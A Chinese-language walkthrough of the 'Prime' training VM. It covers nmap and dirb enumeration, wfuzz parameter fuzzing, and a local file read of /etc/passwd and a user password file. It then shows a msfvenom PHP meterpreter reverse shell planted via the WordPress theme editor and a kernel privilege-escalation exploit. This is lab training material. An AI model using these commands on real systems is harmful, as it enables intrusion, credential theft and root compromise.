最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。
安装方法请参考这篇文章https://blog.csdn.net/m0_55754984/article/details/119177156
1、把下载的Prime靶机,解压后导入到VMware中,网络适配器选择NAT,Kali的系统的也做同样的配置。
1、首先查看kali的IP地址,如下:
2、由于靶机和Kali处于同一网络,所以通过扫描192.168.37.0/24这个C段的网络。即可找出靶机的IP.
拿到了靶机的IP了,接着需要发现靶机上开启了那些服务。
服务和端口是一一对应的,所以,我们可以通过端口扫描进行服务的发现。执行下面的命令进行端口扫描
nmap -sS -sV -p- -T5 192.168.37.129
执行完成,返回如下图:
通过观察上述结果,发现靶机开启了ssh服务和web服务。接着,我们在浏览器访问web服务看能得到什么信息。
通过查看web源码也没有发现,有用的信息。下一步,我们对网站的目录进行深入的挖掘。
目录扫描常用的工具是dirb,这个工具是kali自带的,执行如下命令进行目录的扫描
dirb http://192.168.37.129/
扫描的结果如下:
通过观察上述结果,发现几个可疑的目录,我逐一进行访问,看看能不能得到有用的信息。
访问http://192.168.37.129/dev,得到如下的调戏的话:
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.
大概的意思就是:现在你处于0级阶段,在现实生活中,我们应该使用我们的工具在网络上非常努力地挖掘。 快乐的黑客。
访问wordpress,出现一个简单博客页面,没有什么特别有用的信息。我们在进一步扫描,通过指定一些后缀进行扫描。执行如下的命令
dirb http://192.168.37.129/ -X .txt,.php,.zip
得到如下的结果:
通过观察上述的结果,发现三个可疑的目录,其中secret.txt,太可疑了,进行对它的访问,得到如下的内容:
得到提示信息:
- 对于php文件做更多的fuzz,找到正确的参数parameter
- 可以使用fuzz工具,比如git的:Fuzz_For_Web
- 如果还是卡在这一步,去学学OSCP(Offensive Security Certified Professional)以Kali Linux 实际操作为主要内容的考试
- 如果找到location.txt的位置,就知道下一步怎么做(先记住它,后面会用到)
测试index.php的参数,执行如下命令
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.129/index.php?FUZZ
结果如下:
过滤12个Word的结果,执行如下命令:
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.37.129/index.php?FUZZ
执行结果如下:
根据上面的提示有个文件location.txt 访问 curl http://192.168.37.129/index.php?file=location.txt
得到如下图的结果:
提示使用secrettier360参数在其他的PHP页面上进行挖掘信息。
通过访问curl http://192.168.37.129/image.php?secrettier360=/etc/passwd,得到如下信息:
通过观察上述的提示发现密码放在/home/saket/password.txt,结合刚才发现的读取文件到漏洞,我们构造一个链接curl http://192.168.37.129/image.php?secrettier360=/home/saket/password.txt。得如下的信息
发现了用户名victor。尝试用victor和follow_the_ippsec登录到wordpress的后台。发现能成功登录进入了。登录进入之后,利用主题编辑器(Appearance-Theme Editor)的漏洞进行反弹代码的上传。
通过msfvenom直接生成一个php反弹shell代码更新到目标文件secret.php然后配置好metasploit访问secret.php即可拿shell
生成反弹shell命令如下:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.37.128 lport=7777 -o shell.php
生成的代码直接更新到secret.php中。
删掉/*,写入生成的shell
在kali主机上启动msfconsole,并执行 use exploit/multi/handler如下图:
配置 payload参数,执行如下命令:
set payload php/meterpreter/reverse_tcp
改参数要与生成反弹shell的保持一致(php/meterpreter/reverse_tcp)
配置监听的主机IP和端口号,执行的代码如下:
set lhost 192.168.37.128
set lport 7777
这两个参数也是要和反弹shell的一一对应的。
执行exploit启动监听操作, 访问 http://192.168.37.19/wordpress/wp-content/themes/twentynineteen/secret.php成功反弹shell。
成功进入shell之后,通过getuid发现用户是www-data,基本上没有什么权限。下一步进行提取操作。
提取之前首先查看系统是什么版本,存在什么漏洞可以利用的。通过执行sysinfo命令查看系统版本信息,如下图:
通过观察上述结果发现,系统是Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu。执行msfconsole执行searchsploit 16.04 Ubuntu,结果如下:
由于靶机的内核版本是4.10.0-28,所以采用45010.c这个文件进行提权操作。先把45010.c从
/usr/share/exploitdb/exploits/linux/local/拷贝的root目录下进行编译。如下图:
把提权文件上传到靶机的/tmp目录下,如下图:
给45010文件赋予执行的权限,并执行。如下图:
注意:一定要进入交互shell才给45010修改权限和执行操作。执行shell之后,可以通过
python -c "import pty;pty.spawn('/bin/bash');"获取整个交互shell。
wp禁止主题编辑操作,通过在wp-config.php中,把define(‘DISALLOW_FILE_EDIT’,true)
参考资料:
prime1-笔记-无涯.pdf
